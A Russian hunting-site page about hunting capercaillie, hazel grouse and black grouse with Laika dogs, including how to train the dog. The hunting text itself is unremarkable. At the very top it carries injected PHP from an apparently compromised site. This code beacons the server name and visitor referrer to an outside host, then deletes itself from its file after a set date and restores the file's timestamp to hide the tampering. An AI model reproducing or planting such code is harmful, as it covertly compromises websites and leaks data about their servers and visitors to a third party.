check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727465){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } Способы Охоты С Лайкой По Перу

Заказать Охотничий тур или Сафари

Трофейная Охота

Охотничьи собаки

Найти на нашем сайте

Производственные Компании

Сейчас Онлайн

Сейчас 3965 гостей онлайн

Звоните и узнавайте места

текущего сезона охоты

Способы Охоты С Лайкой По Перу

Охота На Глухаря

Со своей доморощенной лайкой еще по росе вы подошли к урочищам, где заведомо держатся глухари. Сосняки здесь перемежаются с осинниками и березняками, а у речки в мелочах хотя уже и побуревшая, но еще буйная травяная растительность: папоротники, высоченный кипрей и борщевник. По окрайкам болот на гривах повсюду масса спелой брусники и костяники, а в болоте на обросших мхом кочках,- наполовину покрасневшей клюквы. Дурманяще, но так знакомо и привычно пахнет багульником.

Собака уже минут двадцать на своем спором поскоке обшаривает впереди вас каждый укромный лесной уголок, где может в эту пору кормиться боровая птица. Но вот в одном месте она что-то причуяла и на махах скрылась в мелком березняке. Вскоре до вас издалека донесся ее задорный громкий голос. По характеру его вы безошибочно определяете, что она разыскала глухарей. Ускоряете шаг, но чем меньше расстояние, тем осторожнее вы идете, чтобы не спугнуть строгую птицу. Особенно осторожны старые глухари, у которых к этому времени закончилась линька. Нужно совсем бесшумно таясь за деревьями, приблизиться к той группе осин, на одной из которых затаился глухарь. Сделав еще шагов двадцать, вы уже увидели пса, сидящего мордой в вашу сторону перед высоченной осиной. А если это так, следовательно, птица сидит к вам хвостом, что значительно облегчает ее скрадывание. Пес привык, посадив на дерево глухаря или тетерева, издали заслышав ваши шаги, обегать дерево с сидящей на нем птицей так, чтобы одновременно видеть и вас и наблюдать за птицей.
До осины, на вершину которой лает собака, остается шагов сорок, а глухаря еще не видно. Таясь за кустами, вы приближаетесь еще шагов на десять. Глухарь "скыркнул" на назойливую собаку и вы поняли, что она посадила старого петуха. Закачалась ветка, и сквозь поредевшую листву вы заметили темный силуэт крупной птицы. Боясь, что глухарь слетит, почти навскидку стреляете. После выстрела вниз полетели сбитые ветки, а вслед за ними, обивая сухие сучья, рухнул и глухарь. Уложив прекрасный трофей в крошни, вы похвалили пса и, махнув рукой, вновь направили его в поиск.
С лайкой, наваженной облаивать посаженных на дерево птиц, можно с успехом охотиться на глухарей до первых порош.

Охота На Рябчика

Охота с лайкой по выводкам рябчиков с начала августа в основном ничем не отличается от охоты по выводкам глухарей и тетеревов. Но когда рябчики взматереют, они не выдерживают громкого облаивания собаки и слетают до подхода охотника. В связи с этой особенностью охота с лапкой на рябчика мало распространена. Все же с некоторыми экземплярами лаек охотятся и на рябчиков. Оказывается, что посаженный рябчик спокойно сидит на дереве только в том случае, когда собака не лает громко, а лишь поскуливает, повизгивает. Охотник бесшумно подходит, высматривает рябчика и стреляет.

Высмотреть затаившегося рябчика в его защитном оперении очень трудно.

Некоторые охотники, став в удобном для стрельбы месте, спугивают рябчика и бьют его в лёт. Рябчик далеко не отлетает, летит по прямой, за ним спешит лайка и указывает место посадки.

Приучить лапку работать по рябчику без громкого облаивания не трудно. Для этого в начале натаски по выводкам рябчиков нельзя позволять собаке облаивать их, и после подъема выводка рябчиков лайку надо взять на поводок, командуя шепотом «нельзя, нельзя». Повторением этого приема лайку приучают не облаивать рябчиков. Она это скоро поймет, но охотничья страсть и нетерпение все же заставят ее скулить и повизгивать. Этого-то и нужно добиться от лайки.

Охота По Тетеревам "На Подъем"

Особенность этого вида охоты с лайкой по боровой птице заключается в том, что охотник не ждет, когда лайка, подняв птицу, посадит ее на дерево и начнет облаивать, а старается стрелять птицу в лёт сразу, на подъеме.

Этот вид охоты для хорошего стрелка проще и интереснее. Но от лайки здесь требуется большая выдержка и четкая выучка.

Натаска молодой лайки начинается по выводкам. Прихватив след по набродам, лайка замедляет поиск и, принюхиваясь к следу, подбирается к выводку. При этом она повиливает хвостом, иногда оглядывается на идущего за ней хозяина. Затем в непосредственной близости от птицы приостанавливается перед прыжком. Этот момент приостановки нужно уловить, так как тут же последуют прыжок к птице и подъем ее на крыло. Приметив прогал в чаще, где можно уловить мелькнувшую птицу, нужно быть готовым к выстрелу на вскидку. В редколесье с низким подлеском или кустарником стрельба упрощается.

Когда выводки взматереют, после утренней кормежки и среди дня тетерева держатся где-либо в чаще, около полей, где кормились утром; там и нужно искать их с лайкой. Тетерева крепко сидят и дают мало запаха. Все же лайка настолько чутьиста, что улавливает этот запах. Нередко бывает видно, как она останавливается около густого куста, вытянув морду, внюхивается, повиливает хвостом и приготавливается к броску в куст. Этого бывает достаточно для того, чтобы стать в удобную позицию, иногда против собаки, и ждать подъема. После выстрела тетерева далеко не улетают и опять затаиваются в крепи, где их вновь отыскивают с лайкой.

В поиске молодую лайку нужно все время сдерживать командой «тише, тише», чтобы она не уходила далеко от охотника. Лайка скоро усвоит эту команду, так как поднятая вдали от хозяина птица улетает без выстрела, собака не получает удовлетворения охотничьего инстинкта, к тому же и хозяин за плохую работу делает ей выговор строгим голосом.

Охота с лайкой «на подъем» продолжается до тех пор, пока тетерева выдерживают подход собаки. Производится она с неменьшим успехом и по другим видам птицы, подпускающих к себе собаку.

Во время охоты с лайкой «на подъем» в ее работе наблюдаются все элементы работы легавой собаки. Так, например, при «потяжке» лайка с поиска, причуяв птицу, переходит на низовую слежку. Видно, как она изменила ход, перешла на тихую рысь, иногда приостанавливается, внюхивается, а затем осторожно ведет к птице.

Перед тем, как с осторожного подхода сделать бросок, лайка на секунду приостанавливается в непосредственной близости от причуянной птицы. Этой кратковременной остановки бывает достаточно, чтобы ее использовать и стрелять поднявшуюся птицу. Так поступают почти все лайки с первых же дней их натаски по выводкам. Охотниками отмечается, что продолжительность приостановки лаек перед броском бывает различной: некоторые, например, стоят над птицей довольно продолжительное время. Лайка как бы ждет разрешения от хозяина схватить птицу. Впоследствии у лаек этот прием сотрудничества с охотником закрепляется в довольно продолжительную стойку — приостановку. К сожалению, не все охотники-лаечники во-время умеют подметить, развить, а затем и пользоваться этим рабочим приемом В большинстве случаев с первых же охот они не закрепляют у лайки это врожденное свойство — стойку-приостановку, и собака начинает сразу, с «потяжки», поднимать птицу.

Есть у лаек и «подводка» — это бросок в два-три скачка после приостановки перед причуянной птицей, особенно это отчетливо видно в работе по бегущим птицам: фазану, куропатке, коростелю.

Охота На Тетерева "С Подлаиванием"

Охота с лайкой по выводкам тетеревов «с подлаиванием» распространена больше, чем охота «на подъем». Охотники предпочитают этот вид охоты не потому, что он легче, а по укоренившейся привычке стрелять из-под лайки только сидячую подлаянную птицу. Это положение до того вкоренилось в сознание некоторых охотников, что они даже не пытаются стрелять птицу на подъеме, хотя часто имеют эту возможность, а выжидают, пока лайка подлает посаженную птицу Тем не менее, охота «с подлаиванием» интересна. Она требует от охотника выдержки и умения быстро скрадывать сторожкую птицу, а также умения и сноровки высмотреть ее в густой листве.

Кроме обычных мест обитания выводков тетеревов в ягодниках, в мелколесье с полянами и вырубками, они любят держаться и по опушкам смешанных лесов с преобладанием лиственных пород, недалеко от деревень. Целыми выводками, а иногда по два-три выводка вместе, посещают они яровые поля. Особенно любят тетерева овсяные поля, где кормятся утром и вечером с начала поспевания овса и до выпадения снега.

В августе — сентябре днем выводки держатся в кустарниках, около полей, тут же около деревень или по опушкам березняков и осинников. Разведав эти места, охотник направляется туда с молодой лайкой. Сдерживая поиск лайки командой «тише, тише», обыскивает крепкие места. Вскоре лайка находит выводок и часто поднимает на крыло только часть тетеревов. Потревоженные первый раз в течение, дня, они не улетают далеко и рассаживаются тут же, невдалеке, по деревьям. Оставшаяся часть выводка затаивается на месте или перебирается в ближайшие крепкие места. В это время года тетерева садятся на невысокие деревья, в нижнюю часть кроны, в густую листву, иногда в двух-трех метрах от земли.

В конце осени с опадением листвы тетерева садятся на хвойные деревья, ближе к вершине.

После подъема тетеревов на крыло лайка не сразу бросается их преследовать, а, приостановившись на мгновение, смотрит им вслед, вслушиваясь в посадку, затем подбегает к ближайшему тетереву и начинает облаивание.

За редким исключением, лайка всегда находится под деревом с той стороны, где сидит птица. Облаивание у нее должно быть спокойным, она должна находиться поодаль от ствола дерева, не прыгать на него, не царапать ствол и не грызть сучья.

Охотник при взлете тетеревов останавливается и, чтобы не выдать своего присутствия, не шевелясь, ждет облаивания. Тетерева, не заметившие человека, далеко не улетают, а оставшаяся часть выводка не перебегает в другое место.

Заслышав облаивание, охотник осторожно и бесшумно, не суетясь, начинает скрадывать птицу. Вопреки принятому правилу, состоящему в том, что к облаиваемой птице всегда следует подходить с хвоста, на этой охоте многие владельцы лаек предпочитают подходить с той стороны, где находится лайка, так как с этой стороны сидит тетерев головой к собаке, и его высмотреть легче. Подходя с противоположной стороны, тетерева высмотреть труднее—его скрывает густая листва. Охотник нервничает, подходит слишком близко или вынужден заходить сбоку, долго канителится, и нередко тетерев первый замечает охотника и слетает до выстрела. Это портит молодую лайку и дальнейшую охоту.

Лайка преследует слетевшего тетерева, не обращая внимания на других сидящих тетеревов.

Опытная лайка после удачного выстрела подскакивает к падающему тетереву только для того, чтобы убедиться, что он мертв. Не задерживаясь, она спешит к следующей птице, замеченной ею при посадке, и начинает облаивание.

Нередко так удается взять несколько рассевшихся тетеревов. После этого бывалая лайка всегда возвращается на то место, где был поднят выводок, находит оставшихся тетеревов и чаше всего-поодиночке поднимает их, сажает и облаивает.

Охотник, учитывая этот прием работы лайки, чтобы не подшуметь тетеревов, первый не возвращается к месту подъема выводка, а дожидается, пока туда вернется лайка, и ждет ее облаивания.

После листопада охота «с подлаиванием» осложняется, а поздней осенью и в зимние месяцы из-за трудности подхода к облаиваемому тетереву становится почти невозможной.

К этому времени тетерева начинают уже соединяться в стайки, что затрудняет работу лаек.

Чтобы приучить лайку вязко облаивать первого посаженного тетерева, не носиться по лесу за перелетающими и не облаивать то одного, то другого тетерева во время натаски по выводкам, нужно учесть этот недостаток горячих лаек и первое время всегда спокойно ждать возвращения собаки на место взлета выводка. Долго не видя и не слыша хозяина, молодая лайка скоро вернется на то место, где оставила хозяина. Ее тихо подзывают и, обласкав, посылают в поиск.

С таким же успехом производится охота «с подлаиванием» по выводкам, а затем и взматеревшим глухарям.

 


AddThis Social Bookmark Button
 

Добавить комментарий


Защитный код
Обновить